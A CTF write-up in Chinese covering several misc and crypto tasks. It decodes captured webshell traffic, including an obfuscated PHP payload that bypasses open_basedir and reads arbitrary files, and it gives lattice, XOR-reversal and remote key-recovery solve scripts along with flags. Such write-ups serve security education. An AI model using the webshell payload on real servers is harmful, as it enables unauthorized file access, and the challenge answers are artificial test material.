第二届黄河流域网络安全技能挑战赛
misc
ez_wire
这是 webshell 的流量：逐个追踪 HTTP 流，先对请求体做 URL 解码，再做 base64 解码，
最后在其中一个流中发现：
POST /shell.php HTTP/1.1
Host: 172.16.80.10:8080
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; fr-FR) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27
Content-Type: application/x-www-form-urlencoded
Content-Length: 1422
Connection: close
a=%40eval(%40base64_decode(%24_POST%5B'h50e3056ff32e1'%5D))%3B&h50e3056ff32e1=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwgIjAiKTtAc2V0X3RpbWVfbGltaXQoMCk7JG9wZGlyPUBpbmlfZ2V0KCJvcGVuX2Jhc2VkaXIiKTtpZigkb3BkaXIpIHskb2N3ZD1kaXJuYW1lKCRfU0VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSk7JG9wYXJyPXByZWdfc3BsaXQoYmFzZTY0X2RlY29kZSgiTHp0OE9pOD0iKSwkb3BkaXIpO0BhcnJheV9wdXNoKCRvcGFyciwkb2N3ZCxzeXNfZ2V0X3RlbXBfZGlyKCkpO2ZvcmVhY2goJG9wYXJyIGFzICRpdGVtKSB7aWYoIUBpc193cml0YWJsZSgkaXRlbSkpe2NvbnRpbnVlO307JHRtZGlyPSRpdGVtLiIvLjQ1YTliM2IwN2QiO0Bta2RpcigkdG1kaXIpO2lmKCFAZmlsZV9leGlzdHMoJHRtZGlyKSl7Y29udGludWU7fSR0bWRpcj1yZWFscGF0aCgkdG1kaXIpO0BjaGRpcigkdG1kaXIpO0Bpbmlfc2V0KCJvcGVuX2Jhc2VkaXIiLCAiLi4iKTskY250YXJyPUBwcmVnX3NwbGl0KCIvXFxcXHxcLy8iLCR0bWRpcik7Zm9yKCRpPTA7JGk8c2l6ZW9mKCRjbnRhcnIpOyRpKyspe0BjaGRpcigiLi4iKTt9O0Bpbmlfc2V0KCJvcGVuX2Jhc2VkaXIiLCIvIik7QHJtZGlyKCR0bWRpcik7YnJlYWs7fTt9OztmdW5jdGlvbiBhc2VuYygkb3V0KXtyZXR1cm4gQGJhc2U2NF9lbmNvZGUoJG91dCk7fTtmdW5jdGlvbiBhc291dHB1dCgpeyRvdXRwdXQ9b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7ZWNobyAiMzUiLiI5MmMiO2VjaG8gQGFzZW5jKCRvdXRwdXQpO2VjaG8gIjg4MTYiLiIzMjYzIjt9b2Jfc3RhcnQoKTt0cnl7JEY9YmFzZTY0X2RlY29kZShzdWJzdHIoJF9QT1NUWyJ1ZjVmZDVkMjkxNTBmZCJdLDIpKTskUD1AZm9wZW4oJEYsInIiKTtlY2hvKEBmcmVhZCgkUCxmaWxlc2l6ZSgkRik%2FZmlsZXNpemUoJEYpOjQwOTYpKTtAZmNsb3NlKCRQKTs7fWNhdGNoKEV4Y2VwdGlvbiAkZSl7ZWNobyAiRVJST1I6Ly8iLiRlLT5nZXRNZXNzYWdlKCk7fTthc291dHB1dCgpO2RpZSgpOw%3D%3D&uf5fd5d29150fd=uLL2ZsYWcudHh0HTTP/1.1 200 OK
Host: 172.16.80.10:8080
Date: Sat, 23 Sep 2023 02:13:06 GMT
Connection: close
X-Powered-By: PHP/8.2.7
Content-type: text/html; charset=UTF-8
3592cREFTQ1RGezhkOWNkNWU1LTFjYzctMGNhZi05MjRlLTk4NzMxZDNjMTAwZX0=88163263
解码后:
@ini_set("display_errors", "0");@set_time_limit(0);$opdir=@ini_get("open_basedir");if($opdir) {$ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);$oparr=preg_split(base64_decode("Lzt8Oi8="),$opdir);@array_push($oparr,$ocwd,sys_get_temp_dir());foreach($oparr as $item) {if(!@is_writable($item)){continue;};$tmdir=$item."/.45a9b3b07d";@mkdir($tmdir);if(!@file_exists($tmdir)){continue;}$tmdir=realpath($tmdir);@chdir($tmdir);@ini_set("open_basedir", "..");$cntarr=@preg_split("/\|\//",$tmdir);for($i=0;$i<sizeof($cntarr);$i++){@chdir("..");};@ini_set("open_basedir","/");@rmdir($tmdir);break;};};;function asenc($out){return @base64_encode($out);};function asoutput(){$output=ob_get_contents();ob_end_clean();echo "35"."92c";echo @asenc($output);echo "8816"."3263";}ob_start();try{$F=base64_decode(substr($_POST["uf5fd5d29150fd"],2));$P=@fopen($F,"r");echo(@fread($P,filesize($F)?filesize($F):4096));@fclose($P);;}catch(Exception $e){echo "ERROR://".$e->getMessage();};asoutput();die();
DASCTF{8d9cd5e5-1cc7-0caf-924e-98731d3c100e}
响应包里的 base64 前后带有请求代码中 asoutput() 拼出来的标记（开头 `3592c`，结尾 `88163263`），要先按请求里的定义把它们去掉，才能正确解码。
crypto
easyntru
源码
from secret import flag
import libnum
bits = 2048
# Key generation: q is a 2048-bit prime (lower bound 2^2047); f (< 2^1535)
# and g (< 2^511) are the private primes; h = f^-1 * g mod q is published.
while True:
    q = random_prime(2^bits, lbound=2^(bits - 1))
    f = random_prime(2^(3*bits//4 - 1))
    g = random_prime(2^(bits//4 - 1))
    if gcd(f, q*g) == 1:
        h = f.inverse_mod(q) * g % q
        break
# Encryption: r is an ephemeral prime below 2^1535, m is the flag as an
# integer (the assert bounds it below 2^512), c = r*h + m mod q.
r = random_prime(2^(3*bits//4 - 1))
m = libnum.s2n(flag)
assert m < 2^(bits//4)
c = (r * h + m) % q
print('q = %d' % q)
print('h = %d' % h)
print('c = %d' % c)
# Values printed by the challenge; the solve script below reuses them.
q = 24445829856673933058683889356407393860808522483552243481673407476395441107312130500945533047834993780864465577896968035259377721441466959027298166974554621753030728893320770628116412892838297326949997096948374940319126319050202262831370086992122741039059235809755486170276098658609363789670834482459758766315965501103856358827004129316458293962968758091319313119139703281758409686502729987426264868783862562150543872477975124482520151991822540312287812454562890993596447391870392038170902308036014733295394468384998808411243690466996284064331048659179342050962003962851315539367769981491650514319735943099663094899893
h = 4913183942329791657370364901346185016154546804260113829799181697126245901054001842015324265348151984020885129647620152505641164596983663274947698263948774663097557712000980632171097748594337673511102227336174939704483645747401790373320060474777199502879236509921155985395351647045776678540066383822814858118010995298071799515355111562392871675582742450331679030377003011729873888234401630551097244308473512890467393558048369156638425711104036276296581364374424105121033213701940135560177615395895359023414249846471332180098181632276243857635719541258706892559869642925945927703702696983949003370155033272664851406633
c = 23952867341969786229998420209594360249658731959635047659110331734424497403162506614140213749790708068086973241468969253395309243550869149482017583754015801740198734485871141965939993554966887039832701333623276590311516052334557237678750680087492306461195312290860900992532859827406262394480605001436094705579158919540851727801502678160085863180222123880690741582667929660533985778430252783414931317574267109741748071838599712027351385462245528001743693258053631099442571041984251010436099847588345982312217135023484895981833846397834589554744611429133085987275209019352039744743479972391909531680560125335638705509351
仔细审题会发现，这题与前面那一大段参数生成关系不大，关键只是这个式子 c = (r * h + m) % q
构造如下格：
\[(k,1,-r)\times\begin{pmatrix}2^{1023}q & 0 & 0 \\ 2^{1023}c & 2^{1535} & 0 \\ 2^{1023}h & 0 & 1\end{pmatrix} = (2^{1023}m,\ 2^{1535},\ -r)\]
LLL 规约：上面的目标向量三个分量都约为 2^{1535}（因为 m < 2^{512}、r < 2^{1535}），所以它会出现在规约基中，取其第三个分量即得 r
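# Solve script for easyntru (Sage). Public values from the challenge output:
q = 24445829856673933058683889356407393860808522483552243481673407476395441107312130500945533047834993780864465577896968035259377721441466959027298166974554621753030728893320770628116412892838297326949997096948374940319126319050202262831370086992122741039059235809755486170276098658609363789670834482459758766315965501103856358827004129316458293962968758091319313119139703281758409686502729987426264868783862562150543872477975124482520151991822540312287812454562890993596447391870392038170902308036014733295394468384998808411243690466996284064331048659179342050962003962851315539367769981491650514319735943099663094899893
h = 4913183942329791657370364901346185016154546804260113829799181697126245901054001842015324265348151984020885129647620152505641164596983663274947698263948774663097557712000980632171097748594337673511102227336174939704483645747401790373320060474777199502879236509921155985395351647045776678540066383822814858118010995298071799515355111562392871675582742450331679030377003011729873888234401630551097244308473512890467393558048369156638425711104036276296581364374424105121033213701940135560177615395895359023414249846471332180098181632276243857635719541258706892559869642925945927703702696983949003370155033272664851406633
c = 23952867341969786229998420209594360249658731959635047659110331734424497403162506614140213749790708068086973241468969253395309243550869149482017583754015801740198734485871141965939993554966887039832701333623276590311516052334557237678750680087492306461195312290860900992532859827406262394480605001436094705579158919540851727801502678160085863180222123880690741582667929660533985778430252783414931317574267109741748071838599712027351385462245528001743693258053631099442571041984251010436099847588345982312217135023484895981833846397834589554744611429133085987275209019352039744743479972391909531680560125335638705509351
from Crypto.Util.number import long_to_bytes  # not imported in the original snippet

bits = 2048
T = 2^1023                 # weight on the first column, balances the m entry
B = 2^(3*bits//4 - 1)      # 2^1535: bound on r from the challenge, balances the r entry
# c = r*h + m (mod q)  =>  k*q + c - r*h = m for some integer k, so the row
# combination (k, 1, -r) of A is (T*m, B, -r), with every entry about 2^1535.
A = matrix(ZZ, [[T*q, 0, 0],
                [T*c, B, 0],
                [T*h, 0, 1]])

# Do not rely on the target landing at a fixed row index of the reduced
# basis: scan the rows for one with +-B in the middle coordinate and
# accept it only if the implied m respects the challenge's bound (m < 2^512).
m = None
for row in A.LLL():
    if abs(row[1]) != B:
        continue
    r = abs(row[2])
    cand = (c - r*h) % q
    if cand < 2^(bits//4):
        m = cand
        break
assert m is not None, "no short vector of the expected shape after LLL"
print(long_to_bytes(m))
#b'flag{7c95453a-e577-40d8-9ad0-993655b83b69}'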
easy_encrypt
仔细分析后发现，encrypt_1 函数可以直接还原 c1 的前半部分；后半部分只需把 encrypt_1 稍作修改（即下面的 decrypt_1）即可：
def f(word, key):
    """XOR each character of *word* with the integer *key* (Sage ``^^``) and return the resulting string.

    *word* may be any sequence of single-character strings; the output is
    always a ``str`` of the same length.
    """
    return "".join(chr(ord(ch) ^^ key) for ch in word)
# Per-round XOR constants used by encrypt_1 / decrypt_1.
m = 17
n = 18
# Not referenced by the functions below (decrypt_2's parameter of the same
# name shadows it); kept for fidelity with the original.
num = [0 for _ in range(18)]
def encrypt_1(key):
    """Two-round Feistel-like mixing of *key* with the module constants m and n.

    Round 1: new right half = f(R, m) XOR L, new left half = f(R, 2).
    Round 2: the same with n, then the output is x + f(R, 2).
    Uses the module-level helper f and constants m, n. Index i runs over the
    left half, so an odd-length *key* hits an IndexError in round 2 exactly as
    in the original.
    """
    half = len(key) // 2
    left, right = key[:half], key[half:]

    # Round 1 (constant m).
    mixed = f(right, m)
    new_right = "".join(chr(ord(mixed[i]) ^^ ord(left[i])) for i in range(len(left)))
    left, right = f(right, 2), new_right

    # Round 2 (constant n).
    mixed = f(right, n)
    out_left = "".join(chr(ord(mixed[i]) ^^ ord(left[i])) for i in range(len(left)))
    out_right = f(right, 2)
    return out_left + out_right
def decrypt_1(key):
    """Undo round 2 of encrypt_1 for the second half of the ciphertext.

    The right half of *key* is f(R, 2) from round 2, so f(y, 2) recovers R;
    XORing f(R, n) with the left half gives the round-2 L, which is itself
    f(R_round1, 2), hence the final f(L, 2). Uses the module-level f and n.
    """
    half = len(key) // 2
    x, y = key[:half], key[half:]
    R = f(y, 2)
    mixed = f(R, n)
    L = "".join(chr(ord(mixed[i]) ^^ ord(x[i])) for i in range(len(x)))
    return f(L, 2)
with open('cipher.txt', 'r') as file:
    lines = file.readlines()
# Drop the final line of the file before processing.
# NOTE(review): readlines() keeps each trailing newline, and f() calls
# ord() on every element, so this only works if each element is a single
# character — confirm the layout of cipher.txt.
c1 = lines[:-1]
# encrypt_1 reproduces the first half; decrypt_1 inverts the second half.
flag1 = encrypt_1(c1)[:len(c1)//2] + decrypt_1(c1)
#'flag{W0w_y0U_FiND_'
第二部分只是简单的异或和加减偏移，逆向一下即可：
def decrypt_2(num):
    """Invert the second-half encoding: XOR each byte with (i % 3 + 1) and remove a position offset (Sage ``^^``).

    Every index is written twice per pass (once as key[i], once as
    key[length-i-1]); the later write wins, exactly as in the original.
    Returns the decoded characters joined into a string.
    """
    length = len(num)
    key = [0] * length
    for i in range(length):
        mask = i % 3 + 1          # the original's k equals i here
        j = length - i - 1
        key[i] = (num[i] ^^ mask) - i
        key[j] = (num[j] ^^ mask) + i + 1 - length
    return "".join(chr(v) for v in key)
# Ciphertext of the second half, as a list of byte values.
c2 = [119, 107, 102, 97, 58, 114, 122, 124, 108, 122, 72, 45, 49, 48, 44, 49, 51, 141]
flag2 = decrypt_2(c2)
# Join the two recovered halves.
flag = "".join([flag1, flag2])
#'flag{W0w_y0U_FiND_the_4nswer@#$%!!!}'
baby_dfa
参考大佬博客Crypto趣题-分组密码 | 糖醋小鸡块的blog (tangcuxiaojikuai.xyz)
将大佬的脚本拿来稍微改改
import ast
from binascii import *

from Crypto.Util.number import *
from pwn import *
from z3 import *
def rotl(x, n): return ((x << n) & 0xffffffff) | ((x >> (32 - n)) & 0xffffffff)
def xorl(x, y): return list(map(lambda a, b: a ^ b, x, y))
def List2Int(x): return x[0] << 24 | x[1] << 16 | x[2] << 8 | x[3]
def Int2List(x): return [x >> 24, (x >> 16) & 0xff, (x >> 8) & 0xff, x & 0xff]
def l(B):
    """Linear layer of the cipher: word XOR its rotations by 2, 10, 18 and 24 bits.

    *B* is a 4-element byte list; the result is returned in the same form.
    The rotation set matches the L transform of SM4.
    """
    word = List2Int(B)
    mixed = word
    for shift in (2, 10, 18, 24):
        mixed ^= rotl(word, shift)
    return Int2List(mixed)
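def decrypt(K, cipher, inv_S):
    """Invert one block: cipher = l(S[pt ^ K[:4]]) ^ K[4:]. Return the 4-byte plaintext as hex.

    Args:
        K: 8-byte key (bytes or list of ints); K[:4] pre-whitens, K[4:] post-whitens.
        cipher: 4-byte ciphertext block.
        inv_S: inverse S-box (list of 256 ints).
    Raises:
        ValueError: if z3 finds no preimage for the linear layer (should not
            happen — l() is a bijection on 32-bit words).
    """
    # Undo the post-whitening.
    T = List2Int(xorl(K[4:], cipher))
    # Invert the linear layer by asking z3 for the 32-bit preimage.
    s = Solver()
    B = BitVec('B', 32)
    s.add(B ^ rotl(B, 2) ^ rotl(B, 10) ^ rotl(B, 18) ^ rotl(B, 24) == T)
    if s.check() != sat:
        raise ValueError("linear layer has no preimage for T=%#x" % T)
    # Read the value from the model directly; slicing str(model) depended on
    # z3's printing format ("[B = 123]").
    pre = Int2List(s.model()[B].as_long())
    # Undo the S-box, then the pre-whitening.
    pre = [inv_S[v] for v in pre]
    # bytes(...) keeps leading zero bytes; long_to_bytes() would drop them and
    # shorten the hex string sent back to the service.
    return bytes(xorl(K[:4], pre)).hex()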
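def _query_encrypt(r, plaintext):
    """Use menu option 1 to encrypt one block and return the raw ciphertext bytes.

    The service expects hex input and answers with one hex line; unhexlify()
    raises ValueError on a malformed reply, which getflag() treats as
    "reconnect and retry".
    """
    r.recvuntil(b"> ")
    r.sendline(b"1")
    r.recvuntil(b"plz enter your plaintext: ")
    r.sendline(hexlify(plaintext))
    return unhexlify(r.recvline().strip())


def getflag(max_attempts=None):
    """Recover the per-connection key from chosen plaintexts, then answer the decryption challenge.

    Each connection publishes a fresh S-box. key[:4] is recovered from the
    ciphertext differences of single-byte plaintexts, key[4:] from encrypting
    the recovered key[:4]; the key is then used on menu option 2. Returns as
    soon as the service's reply does not contain "fake!"; any failure closes
    the connection and retries.

    Args:
        max_attempts: give up after this many connections (None = retry
            forever, the original behaviour).
    Raises:
        RuntimeError: when max_attempts is exhausted.
    """
    attempts = 0
    while max_attempts is None or attempts < max_attempts:
        attempts += 1
        r = None
        try:
            r = remote("60.204.206.104", 7000)
            r.recvuntil(b"sbox: ")
            # The S-box arrives as a Python list literal; literal_eval parses it
            # without executing anything else the peer might send (eval() did).
            S = ast.literal_eval(r.recvline().decode())
            inv_S = [0] * 256
            for i, v in enumerate(S):
                inv_S[v] = i

            # Chosen plaintexts: the all-zero block, then a single 0x01 byte
            # moving from the last byte position to the first.
            x = [_query_encrypt(r, b"\x00" * 4)]
            for pos in range(3, -1, -1):
                x.append(_query_encrypt(r, b"\x00" * pos + b"\x01" + b"\x00" * (3 - pos)))
            print(x)

            # 1. key[:4]: each ciphertext difference isolates
            # rotl8(S[j]) ^ rotl8(S[j ^ 1]) for the key byte j at that position.
            key_prefix = []
            for i in range(1, 5):
                if i % 2 == 0:
                    temp = xorl(x[0], x[i])[i - 2]
                else:
                    temp = xorl(x[0], x[i])[i]
                for j in range(255):
                    # (v >> 6) + ((v & 0x3f) << 2) is an 8-bit rotate-left by 2.
                    t1 = (S[j] >> 6) + ((S[j] & 0b111111) << 2)
                    t2 = (S[j ^ 1] >> 6) + ((S[j ^ 1] & 0b111111) << 2)
                    if t1 ^ t2 == temp:
                        key_prefix.append(inv_S[S[j]])
                        break
            key_prefix = key_prefix[::-1]
            print(key_prefix)
            if len(key_prefix) != 4:
                raise ValueError("key[:4] recovery incomplete: %r" % key_prefix)

            # 2. key[4:]: encrypting key[:4] itself feeds all-zero bytes into
            # the S-box, so ciphertext = l(S[0]*4) ^ key[4:].
            # bytes(key_prefix) keeps a leading 0x00 byte that
            # long_to_bytes(List2Int(...)) dropped, which sent a 3-byte block.
            ct = _query_encrypt(r, bytes(key_prefix))
            key_suffix = xorl(l([S[0]] * 4), list(ct))
            key_final = bytes(key_prefix) + bytes(key_suffix)
            print(key_final)

            # 3. Answer the decryption challenge with the recovered key.
            r.recvuntil(b"> ")
            r.sendline(b"2")
            r.recvuntil(b"cipher is ")
            cipher = unhexlify(r.recvline().strip())
            r.sendline(decrypt(key_final, cipher, inv_S))
            reply = r.recvline()
            print(reply)
            if b"fake!" not in reply:
                return
        except Exception as exc:  # any failure (short key, bad reply) => reconnect
            print("attempt %d failed: %r" % (attempts, exc))
        finally:
            if r is not None:
                r.close()
    raise RuntimeError("no valid key after %d attempts" % attempts)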
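if __name__ == "__main__":
    # Run the solver only when executed directly, not when the helpers are imported.
    getflag()
#b"plz enter your plaintext: b'flag{21a7369e-b123-05cb-e80a-982a4f85308a}'\n"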
